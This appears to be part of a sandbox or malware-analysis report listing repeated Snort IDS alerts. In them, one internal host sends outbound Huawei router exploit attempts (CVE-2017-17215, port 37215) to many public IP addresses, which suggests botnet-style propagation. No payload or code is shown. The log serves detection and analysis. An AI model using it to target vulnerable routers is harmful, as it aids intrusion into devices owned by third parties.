                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51020 -> 41.196.126.1:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51020 -> 41.196.126.1:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54424 -> 125.79.62.244:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54424 -> 125.79.62.244:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44874 -> 171.128.195.137:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44874 -> 171.128.195.137:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:32896 -> 221.104.140.125:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:32896 -> 221.104.140.125:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42818 -> 157.160.52.78:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42818 -> 157.160.52.78:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33212 -> 41.236.232.103:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33212 -> 41.236.232.103:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56736 -> 197.132.201.193:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56736 -> 197.132.201.193:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39902 -> 157.152.213.148:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39902 -> 157.152.213.148:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43418 -> 197.107.22.161:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43418 -> 197.107.22.161:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34364 -> 41.68.57.166:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34364 -> 41.68.57.166:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36912 -> 197.211.212.8:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36912 -> 197.211.212.8:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37448 -> 197.77.24.89:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37448 -> 197.77.24.89:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50420 -> 41.30.137.212:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50420 -> 41.30.137.212:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41654 -> 157.185.35.87:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41654 -> 157.185.35.87:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58008 -> 5.96.24.64:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58008 -> 5.96.24.64:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54936 -> 157.212.90.236:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54936 -> 157.212.90.236:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47448 -> 77.76.169.184:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47448 -> 77.76.169.184:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54430 -> 157.227.252.63:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54430 -> 157.227.252.63:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53562 -> 172.2.237.22:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53562 -> 172.2.237.22:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41576 -> 197.52.39.17:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41576 -> 197.52.39.17:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40576 -> 41.189.126.251:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40576 -> 41.189.126.251:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41042 -> 41.115.148.8:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41042 -> 41.115.148.8:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42784 -> 197.83.244.91:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42784 -> 197.83.244.91:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42728 -> 139.13.35.184:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42728 -> 139.13.35.184:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52450 -> 197.251.154.46:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52450 -> 197.251.154.46:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58588 -> 186.184.213.120:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58588 -> 186.184.213.120:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47206 -> 197.60.100.141:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47206 -> 197.60.100.141:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47512 -> 95.129.116.158:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47512 -> 95.129.116.158:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48014 -> 89.92.141.49:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48014 -> 89.92.141.49:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40824 -> 157.5.208.61:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40824 -> 157.5.208.61:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47300 -> 173.121.75.210:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47300 -> 173.121.75.210:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43948 -> 157.209.178.18:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43948 -> 157.209.178.18:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36746 -> 157.15.8.197:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36746 -> 157.15.8.197:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52278 -> 197.23.163.14:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52278 -> 197.23.163.14:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35346 -> 197.202.196.183:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35346 -> 197.202.196.183:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51136 -> 74.101.176.184:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51136 -> 74.101.176.184:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57684 -> 157.72.125.10:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57684 -> 157.72.125.10:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38606 -> 157.155.92.145:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38606 -> 157.155.92.145:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56846 -> 157.102.180.139:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56846 -> 157.102.180.139:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43764 -> 17.179.142.78:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43764 -> 17.179.142.78:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37186 -> 41.216.54.185:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37186 -> 41.216.54.185:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34884 -> 157.12.119.99:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34884 -> 157.12.119.99:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50136 -> 157.61.150.149:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50136 -> 157.61.150.149:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43062 -> 157.255.193.204:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43062 -> 157.255.193.204:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38180 -> 197.37.236.98:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38180 -> 197.37.236.98:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50842 -> 157.16.184.209:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50842 -> 157.16.184.209:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46238 -> 197.45.163.77:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46238 -> 197.45.163.77:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33700 -> 83.156.17.59:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33700 -> 83.156.17.59:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34698 -> 90.185.86.151:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34698 -> 90.185.86.151:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55706 -> 197.57.176.135:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55706 -> 197.57.176.135:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34588 -> 197.186.174.45:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34588 -> 197.186.174.45:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50170 -> 157.144.237.122:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50170 -> 157.144.237.122:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49136 -> 158.13.46.18:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49136 -> 158.13.46.18:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56852 -> 157.144.212.156:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56852 -> 157.144.212.156:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56194 -> 157.29.80.97:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56194 -> 157.29.80.97:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48438 -> 157.144.214.203:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48438 -> 157.144.214.203:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52140 -> 157.50.56.249:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52140 -> 157.50.56.249:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52774 -> 32.202.29.246:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52774 -> 32.202.29.246:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57070 -> 197.159.156.241:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57070 -> 197.159.156.241:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:45828 -> 157.51.85.78:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:45828 -> 157.51.85.78:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52712 -> 115.183.79.252:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52712 -> 115.183.79.252:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52404 -> 157.135.80.174:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52404 -> 157.135.80.174:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37302 -> 197.158.255.222:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37302 -> 197.158.255.222:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39262 -> 197.225.60.127:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39262 -> 197.225.60.127:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60510 -> 157.202.85.97:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60510 -> 157.202.85.97:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35752 -> 96.209.118.195:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35752 -> 96.209.118.195:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56588 -> 73.111.130.134:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56588 -> 73.111.130.134:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43934 -> 90.7.62.50:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43934 -> 90.7.62.50:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51444 -> 197.88.81.225:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51444 -> 197.88.81.225:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49426 -> 197.99.215.32:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49426 -> 197.99.215.32:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35154 -> 111.12.69.255:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35154 -> 111.12.69.255:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40870 -> 41.122.12.150:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40870 -> 41.122.12.150:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56838 -> 197.227.245.236:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56838 -> 197.227.245.236:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58662 -> 197.249.140.55:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58662 -> 197.249.140.55:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51320 -> 41.149.109.197:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51320 -> 41.149.109.197:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51652 -> 41.211.47.10:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51652 -> 41.211.47.10:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39072 -> 61.176.198.121:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39072 -> 61.176.198.121:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53088 -> 197.254.13.134:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53088 -> 197.254.13.134:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50380 -> 41.36.60.196:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50380 -> 41.36.60.196:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56760 -> 18.58.222.60:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56760 -> 18.58.222.60:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58418 -> 115.126.63.255:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58418 -> 115.126.63.255:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47786 -> 157.242.244.136:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47786 -> 157.242.244.136:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33062 -> 41.65.39.223:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33062 -> 41.65.39.223:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41788 -> 157.119.94.143:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41788 -> 157.119.94.143:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51680 -> 197.26.218.26:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51680 -> 197.26.218.26:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54082 -> 197.56.126.122:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54082 -> 197.56.126.122:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60832 -> 157.189.254.100:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60832 -> 157.189.254.100:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47416 -> 152.57.176.37:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47416 -> 152.57.176.37:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54396 -> 197.211.79.230:37215
